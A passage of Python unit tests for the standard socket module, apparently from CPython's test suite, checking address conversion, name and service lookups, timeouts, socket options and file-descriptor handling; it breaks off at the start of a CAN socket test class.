interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind(os.path.join(tmpdir, 'socket'))
self._test_socket_fileno(s, socket.AF_UNIX, socket.SOCK_STREAM)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
